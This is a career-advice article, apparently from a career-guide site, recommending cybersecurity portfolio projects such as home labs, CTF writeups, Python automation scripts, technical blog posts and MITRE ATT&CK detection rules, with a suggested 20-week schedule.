What cybersecurity side projects should I build for my portfolio?

A cybersecurity portfolio is the single highest-signal differentiator for entry-level candidates per LinkedIn 2024 Talent Insights and several published intern-hiring manager interviews. Certifications prove you can pass an exam; the portfolio proves you can do the work. Hiring managers reviewing 200 to 400 entry-level resumes per posting filter on demonstrated artifacts (GitHub repos, published writeups, public CTF rankings) far more reliably than on certification count alone. Five project categories carry the most weight: home lab documentation, CTF writeups, security automation scripts, technical writing on real incidents, and detection content mapped to MITRE ATT&CK.

Home lab documentation. Set up a virtual network with VirtualBox or VMware Workstation Player on commodity hardware (a 16GB RAM laptop or a $400 used SFF PC handles it). Run a SIEM (Wazuh is free and production-quality, Splunk Free is limited but well-known, Elastic Security free tier works), a pfSense or OPNsense firewall, Windows 10 or 11 evaluation VMs, Ubuntu Server, and one deliberately vulnerable target (DVWA, OWASP Juice Shop, Metasploitable 3, HackTheBox prebuilt). Document the network topology, configuration choices, detection rule selection rationale, and 3 to 5 simulated attack scenarios with screenshots and SIEM evidence. Publish on GitHub with a clear README. This single artifact often closes interviews because it demonstrates you can build, operate, and analyze the same tooling SOC analysts work with daily.

CTF writeups. Compete on TryHackMe (free and paid tiers, the SOC Level 1 path is the standard entry path), Hack The Box (Academy plus machines), CyberDefenders (blue-team focused, free challenges with employer access), or Blue Team Labs Online. Write detailed writeups for 5 to 15 challenges explaining your methodology, tools used, failed attempts (these matter; they show real thinking), and lessons learned. Publish on GitHub Pages or a personal blog at a custom domain. Hiring managers read writeups specifically; well-written writeups close interviews. Top 5 percent rank on any major platform plus 5 published writeups produces direct recruiter outreach.

Security automation scripts. Write 3 to 5 Python scripts that automate real security tasks. Example projects: a VirusTotal-API wrapper that takes a list of IPs or file hashes and produces a reputation report, a parser that extracts indicators of compromise (IOCs) from Apache or Windows event logs and maps them to MITRE ATT&CK techniques, an OSINT tool that gathers WHOIS plus DNS plus certificate transparency data on a domain, a Sigma-rule-to-Splunk-search translator, or a CSV-to-STIX 2.1 converter. Push code to GitHub with clear README documentation, requirements.txt, type hints, and unit tests using pytest. Code quality matters; sloppy scripts hurt rather than help. Reviewers spot copy-pasted ChatGPT output quickly.

Technical writing on real incidents and concepts. Write 5 to 10 posts on a personal blog or Medium. Strong topics: detailed analysis of a recent CISA advisory or known-exploited vulnerability with detection content recommendations, walkthrough of building detection for a specific MITRE ATT&CK technique (e.g., T1059.001 PowerShell execution), comparative review of two SIEM platforms based on hands-on lab experience, root-cause analysis of a published breach (Verizon DBIR case studies work well), explanation of a security concept that you previously misunderstood (e.g., what TLS 1.3 0-RTT actually changes versus 1.2). Writing demonstrates both knowledge and the communication skills that senior cybersecurity roles require. Bad writing actively hurts your candidacy; have one writeup edited carefully before publishing.

Detection content mapped to MITRE ATT&CK. Publish a small detection-rule set on GitHub mapping at least 10 detections to specific MITRE ATT&CK Enterprise techniques. Use Sigma format (vendor-neutral) or Splunk SPL or KQL for Microsoft Sentinel. For each rule include: the technique ID and name, the data source required, the detection logic, expected false positives, and tuning recommendations. Sigma HQ on GitHub maintains the open community-detection repo and is an excellent reference. Detection engineering is increasingly the most in-demand sub-discipline; a public detection portfolio signals readiness for that role family directly.

Project sequencing and time investment. Weeks 1-4: home lab setup with Wazuh, basic detection content, 1 documented attack scenario. Weeks 5-8: TryHackMe SOC Level 1 path completion plus 3 published writeups. Weeks 9-12: build 2 Python automation scripts and publish to GitHub with documentation. Weeks 13-16: write 5 technical blog posts. Weeks 17-20: publish 10 detection rules with documentation. Total time investment 200 to 300 hours over 5 months at 10 to 15 hours per week. This portfolio compresses the gap between certification holder and demonstrated practitioner.

Honest tradeoffs and pitfalls. Quality beats quantity: 5 well-documented projects beat 20 shallow ones. Public-vs-private: always publish publicly so hiring managers can verify (hiring managers cannot click into private repos). Plagiarism detection: copying a TryHackMe walkthrough verbatim or stealing detection rules without attribution will be detected and disqualify candidates instantly. Sensitive data: never publish home lab configurations that contain real credentials, real customer data, or anything that could be misinterpreted as unauthorized scanning of real systems. Burnout: portfolio building is sustainable at 10 to 15 hours per week; trying to compress it into 40 hours per week for 2 months produces shallow work that hurts your candidacy. DecipherU's career guides include specific portfolio project recommendations for SOC, GRC, AppSec, cloud security, and cybersecurity sales pre-sales tracks.